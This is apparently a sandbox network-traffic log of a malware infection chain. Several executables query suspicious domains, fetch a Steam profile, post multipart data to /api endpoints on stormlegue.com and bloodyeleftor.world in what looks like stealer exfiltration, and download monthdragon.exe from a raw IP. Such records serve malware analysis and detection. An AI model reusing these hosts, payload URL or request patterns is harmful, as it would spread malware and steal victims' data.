                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3099.28 Safari/537.36
                                                                                              Referer: http://elviscomputer.hu
                                                                                              Response
                                                                                              HTTP/1.1 403 Forbidden
                                                                                              Server: nginx
                                                                                              Date: Thu, 20 Feb 2025 00:34:26 GMT
                                                                                              Content-Type: text/html
                                                                                              Content-Length: 8341
                                                                                              Connection: close
                                                                                              ETag: "63912a21-2095"
                                                                                            • flag-us
                                                                                              DNS
                                                                                              i.instagram.com
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              i.instagram.com
                                                                                              IN A
                                                                                              Response
                                                                                              i.instagram.com
                                                                                              IN CNAME
                                                                                              instagram.c10r.instagram.com
                                                                                              instagram.c10r.instagram.com
                                                                                              IN A
                                                                                              163.70.151.63
                                                                                            • flag-us
                                                                                              DNS
                                                                                              breakfasutwy.cyou
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              breakfasutwy.cyou
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              importenptoc.com
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              importenptoc.com
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              voicesharped.com
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              voicesharped.com
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              inputrreparnt.com
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              inputrreparnt.com
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              torpdidebar.com
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              torpdidebar.com
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              rebeldettern.com
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              rebeldettern.com
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              actiothreaz.com
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              actiothreaz.com
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              garulouscuto.com
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              garulouscuto.com
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              breedertremnd.com
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              breedertremnd.com
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              steamcommunity.com
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              steamcommunity.com
                                                                                              IN A
                                                                                              Response
                                                                                              steamcommunity.com
                                                                                              IN A
                                                                                              104.82.234.109
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://steamcommunity.com/profiles/76561199822375128
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              104.82.234.109:443
                                                                                              Request
                                                                                              GET /profiles/76561199822375128 HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Host: steamcommunity.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;
                                                                                              Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                              Cache-Control: no-cache
                                                                                              Date: Thu, 20 Feb 2025 00:34:28 GMT
                                                                                              Content-Length: 35769
                                                                                              Connection: keep-alive
                                                                                              Set-Cookie: sessionid=ed58617d279cbd03ef5c6ad9; Path=/; Secure; SameSite=None
                                                                                              Set-Cookie: steamCountry=GB%7Cdcacbc5cf7f4b2dc1ed43dd213cf0dc5; path=/; secure; HttpOnly; SameSite=None
                                                                                            • flag-us
                                                                                              DNS
                                                                                              nestlecompany.pro
                                                                                              con12312211221.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              nestlecompany.pro
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              shiningrstars.help
                                                                                              alex12112.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              shiningrstars.help
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              mercharena.biz
                                                                                              alex12112.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              mercharena.biz
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              t.me
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              t.me
                                                                                              IN A
                                                                                              Response
                                                                                              t.me
                                                                                              IN A
                                                                                              149.154.167.99
                                                                                            • flag-us
                                                                                              DNS
                                                                                              generalmills.pro
                                                                                              alex12112.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              generalmills.pro
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              con12312211221.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 403 Forbidden
                                                                                              Date: Thu, 20 Feb 2025 00:34:28 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jQLa9yMibAAyZxYDBA0mLqInaIrlvO%2BGaZ8hT5TdABeuOGfldEJXVidQT%2B%2Bcz5NxpHRHrRjGvuDAPW%2Fwx7PlegG5RUfT6Vw7QnVH%2Fu59AhGZKN94aF9wnLJytX7ZW6a01g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a693fa8c67717-LHR
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              con12312211221.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=dft4D3C583KGDOmib_4ps1U4I78YMNqbdR5m2Z_DxZQ-1740011668-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 50
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:28 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=vborrppbk4cgki3rjfhncj70oj; expires=Fri, 21 Feb 2025 00:34:28 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5QSIyZt8eK5D1tm8ls%2B%2F3nKOEYPVRZtW9oWJ7duJDRAl%2BOdjS2dRdyo9BaSLU3REiPyTofiB0b%2FWwcihxnF2PJZuezGUliJr6wyqvnB7PZSum42wJPQhoAtwkUTxtVIdKA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a694009627717-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=43323&min_rtt=41928&rtt_var=7981&sent=14&recv=11&lost=0&retrans=0&sent_bytes=8837&recv_bytes=1060&delivery_rate=223642&cwnd=255&unsent_bytes=0&cid=b56f5dbc4961837e&ts=382&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              con12312211221.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=I966PKGDH1FN0P98AL
                                                                                              Cookie: __cf_mw_byp=dft4D3C583KGDOmib_4ps1U4I78YMNqbdR5m2Z_DxZQ-1740011668-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1671
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:28 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=s2tijhcts9eqfg5houaif0vv91; expires=Fri, 21 Feb 2025 00:34:28 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=331kad3CblRkoqqlSLyvI7R9PD8mcJdXNEHMVVVXzLEjg9vg2HTekgCZHXLoP6etDvGgBbUsFLoo4szdmqVFLtAyKqykepkRkVI2MEPyG9LfCngyl4CKNVnzruyGjBjamg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a69421b1b7717-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=45029&min_rtt=41928&rtt_var=9397&sent=17&recv=15&lost=0&retrans=0&sent_bytes=10010&recv_bytes=3157&delivery_rate=223642&cwnd=255&unsent_bytes=0&cid=b56f5dbc4961837e&ts=620&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://bloodyeleftor.world/api
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              104.21.63.231:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: bloodyeleftor.world
                                                                                              Response
                                                                                              HTTP/1.1 403 Forbidden
                                                                                              Date: Thu, 20 Feb 2025 00:34:28 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6021j8cybDUPtljyP07oELXGOxleW%2F2POCuZO%2Fkx75EXqxgb6fud2iLpS2%2Br5tbJgqm5zhXJUE42y8lD1QO0Ls9k1iUCiKiUPnoukJuXfN%2FBBVbpyag4h7CmtSEY5GbylO%2FcB0pQ"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a69412bf877a1-LHR
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://bloodyeleftor.world/api
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              104.21.63.231:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=SEdkkyVCSLWCgbR5Zko9mEEYFmBcSaifauxYpKFC628-1740011668-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 45
                                                                                              Host: bloodyeleftor.world
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:28 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=musm5rt06fddv2pe49fcc4o97g; expires=Fri, 21 Feb 2025 00:34:28 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qZKiAsEmmefZUraZGfutdhTRvcEys6vYkMMKGAxA%2FYMOG0Z5%2BCXumMxuZe6JYSTdzo%2FIE0Bfl4MPqRxYCE3%2FvM9NytF0HkVcNm2%2FpxQJNC2T%2FgzrA4n6DcTAABK5jWAq4lUmhJRU"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a69419ce777a1-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=43936&min_rtt=41920&rtt_var=11389&sent=13&recv=10&lost=0&retrans=0&sent_bytes=8580&recv_bytes=1070&delivery_rate=178150&cwnd=253&unsent_bytes=0&cid=ff1ede99d49b57a1&ts=383&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://bloodyeleftor.world/api
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              104.21.63.231:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=YSPU02C2
                                                                                              Cookie: __cf_mw_byp=SEdkkyVCSLWCgbR5Zko9mEEYFmBcSaifauxYpKFC628-1740011668-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1613
                                                                                              Host: bloodyeleftor.world
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:29 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=vhacvu4totdd6801gecq6t61pg; expires=Fri, 21 Feb 2025 00:34:29 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ez5g%2Fa4Jofq81nO8y%2B2skAkiAJjDQkDD3Y%2B8cF8wAunLSYhauBQGbQJzbIV1njowET75wEeciKf5%2F6pdxcyJuDgCcPcQYNPp4KOYudhQAim7tLl6KTXLWqVH%2BpRykKmpaYi6vj1x"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a69436fb977a1-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=44204&min_rtt=41920&rtt_var=9077&sent=17&recv=14&lost=0&retrans=0&sent_bytes=9758&recv_bytes=3104&delivery_rate=178150&cwnd=253&unsent_bytes=0&cid=ff1ede99d49b57a1&ts=652&x=0"
                                                                                            • flag-us
                                                                                              DNS
                                                                                              google.com
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              google.com
                                                                                              IN MX
                                                                                              Response
                                                                                              google.com
                                                                                              IN MX
                                                                                              smtp�
                                                                                            • flag-us
                                                                                              DNS
                                                                                              smtp.google.com
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              smtp.google.com
                                                                                              IN A
                                                                                              Response
                                                                                              smtp.google.com
                                                                                              IN A
                                                                                              142.250.27.27
                                                                                              smtp.google.com
                                                                                              IN A
                                                                                              142.250.102.26
                                                                                              smtp.google.com
                                                                                              IN A
                                                                                              142.250.27.26
                                                                                              smtp.google.com
                                                                                              IN A
                                                                                              142.250.102.27
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              con12312211221.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=PF1XG8C11K50AMUK3
                                                                                              Cookie: __cf_mw_byp=dft4D3C583KGDOmib_4ps1U4I78YMNqbdR5m2Z_DxZQ-1740011668-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1112
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:29 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=mrq3bkcoqsda380jfourdrrn64; expires=Fri, 21 Feb 2025 00:34:29 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T26j3PJFxNfFDnLUyqtG8P4itgt3cVmBG%2BO6igpZsYciJ1Z7VK68v7aEbX%2F1uYn5EH1lXBfFm%2F75nLctvOiyf4UqDOF3DBPz%2FiubVIr0cvz77Jqc67ZpQypyWtZYo1aScw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a69447a4acd82-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=45955&min_rtt=44313&rtt_var=13781&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3564&recv_bytes=1811&delivery_rate=91869&cwnd=248&unsent_bytes=0&cid=f54236d025a4430e&ts=315&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://bloodyeleftor.world/api
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              104.21.63.231:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=N5YM52MNA1LUA
                                                                                              Cookie: __cf_mw_byp=SEdkkyVCSLWCgbR5Zko9mEEYFmBcSaifauxYpKFC628-1740011668-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1078
                                                                                              Host: bloodyeleftor.world
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:29 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=no97tlrrov3bqmk8nd8314jh1m; expires=Fri, 21 Feb 2025 00:34:29 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jGH7YUIPYLyCx7%2BijEfpm1Po0P27s6AIorOq9gTcW8Bh6t76X15VeX6ukqbUObnpCxTfCKnQ8GrpxS9zGH34YwAya220dSvPZRRDK7LvL9xqITStIvOyfx7A9M9jjIq%2FFl8W1S5X"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a6945fe9f945a-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=44675&min_rtt=42273&rtt_var=13992&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3307&recv_bytes=1783&delivery_rate=96302&cwnd=253&unsent_bytes=0&cid=79463cfbc082d36e&ts=315&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://stormlegue.com/api
                                                                                              con12312211221.exe
                                                                                              Remote address:
                                                                                              104.21.16.1:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=dft4D3C583KGDOmib_4ps1U4I78YMNqbdR5m2Z_DxZQ-1740011668-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 84
                                                                                              Host: stormlegue.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:29 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=gfflb536jaiu6bu6qjng1a7bhr; expires=Fri, 21 Feb 2025 00:34:29 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AqBtVTVqLvh9R%2FmrDsX%2FCqArNRB2h6r%2BaksvKUA5omYt4lrjIf2HeydFqfnCqqGRD7W4hIinR%2BVsLRpM5qlP5qxbFHyBkNFj5ItmO7QijyEcbGmL%2BA0%2BhS07wf5xheoDQA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a6946fc56cd82-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=42701&min_rtt=42137&rtt_var=9915&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3565&recv_bytes=767&delivery_rate=93354&cwnd=248&unsent_bytes=0&cid=55bfd5d2b11b0a19&ts=211&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://bloodyeleftor.world/api
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              104.21.63.231:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=SEdkkyVCSLWCgbR5Zko9mEEYFmBcSaifauxYpKFC628-1740011668-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 80
                                                                                              Host: bloodyeleftor.world
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:30 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=ig29mf68dbjsfutkminrl26i6a; expires=Fri, 21 Feb 2025 00:34:29 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XuXC1JFGjBt5Tn7aJ%2F9CxsZYetNHqfcWBDUFHZ0ksJ6bqVRU4OipEgBnXK6OChCoifTwnh%2F5zIP1ZDwpRgWVa89VeKLZvrsrjqT87Ix5ce2pzX0vIP8blcAzVHzAl3xxw2kpD7wh"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a69487815945a-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=42377&min_rtt=41992&rtt_var=9426&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3308&recv_bytes=773&delivery_rate=93000&cwnd=253&unsent_bytes=0&cid=acc6a4a70ffaa71f&ts=259&x=0"
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.97/files/FuckMAIN/monthdragon.exe
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              185.215.113.97:80
                                                                                              Request
                                                                                              GET /files/FuckMAIN/monthdragon.exe HTTP/1.1
                                                                                              Host: 185.215.113.97
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:31 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 353280
